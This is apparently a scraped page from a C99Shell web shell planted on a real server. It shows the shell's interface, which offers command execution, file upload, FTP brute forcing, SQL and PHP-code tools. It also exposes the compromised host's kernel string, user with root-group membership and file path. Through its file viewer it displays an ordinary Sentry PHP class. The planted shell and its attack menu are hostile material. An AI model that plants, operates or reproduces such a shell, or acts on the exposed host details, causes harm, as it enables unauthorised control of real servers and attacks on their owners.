!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/   drwxr-xr-x
Free 29.11 GB of 117.98 GB (24.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExceptionDataBag.php (2.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry;

/**
 * This class represents the Exception Interface and contains the details of an
 * exception or error that occurred in the program.
 *
 * @author Stefano Arlandini <sarlandini@alice.it>
 */
final class ExceptionDataBag
{
    
/**
     * @var string The type of exception, e.g. RuntimeException
     */
    
private $type;

    
/**
     * @var string The value of the exception
     */
    
private $value;

    
/**
     * @var Stacktrace|null An optional stack trace object corresponding to the Stack Trace Interface
     */
    
private $stacktrace;

    
/**
     * @var ExceptionMechanism|null An optional object describing the mechanism that created this exception
     */
    
private $mechanism;

    public function 
__construct(\Throwable $exception, ?Stacktrace $stacktrace null, ?ExceptionMechanism $mechanism null)
    {
        
$this->type \get_class($exception);
        
$this->value $exception->getMessage();
        
$this->stacktrace $stacktrace;
        
$this->mechanism $mechanism;
    }

    
/**
     * Gets the type of exception, e.g. RuntimeException.
     */
    
public function getType(): string
    
{
        return 
$this->type;
    }

    
/**
     * Sets the type of the exception.
     *
     * @param string $type The exception type
     */
    
public function setType(string $type): void
    
{
        
$this->type $type;
    }

    
/**
     * Gets the value of the exception.
     */
    
public function getValue(): string
    
{
        return 
$this->value;
    }

    
/**
     * Sets the value of the exception.
     */
    
public function setValue(string $value): void
    
{
        
$this->value $value;
    }

    
/**
     * Gets the stack trace object corresponding to the Stack Trace Interface.
     */
    
public function getStacktrace(): ?Stacktrace
    
{
        return 
$this->stacktrace;
    }

    
/**
     * Sets the stack trace object corresponding to the Stack Trace Interface.
     *
     * @param Stacktrace $stacktrace The stacktrace
     */
    
public function setStacktrace(Stacktrace $stacktrace): void
    
{
        
$this->stacktrace $stacktrace;
    }

    
/**
     * Gets the object describing the mechanism that created this exception.
     */
    
public function getMechanism(): ?ExceptionMechanism
    
{
        return 
$this->mechanism;
    }

    
/**
     * Sets the object describing the mechanism that created this exception.
     *
     * @param ExceptionMechanism|null $mechanism The mechanism that created this exception
     */
    
public function setMechanism(?ExceptionMechanism $mechanism): void
    
{
        
$this->mechanism $mechanism;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--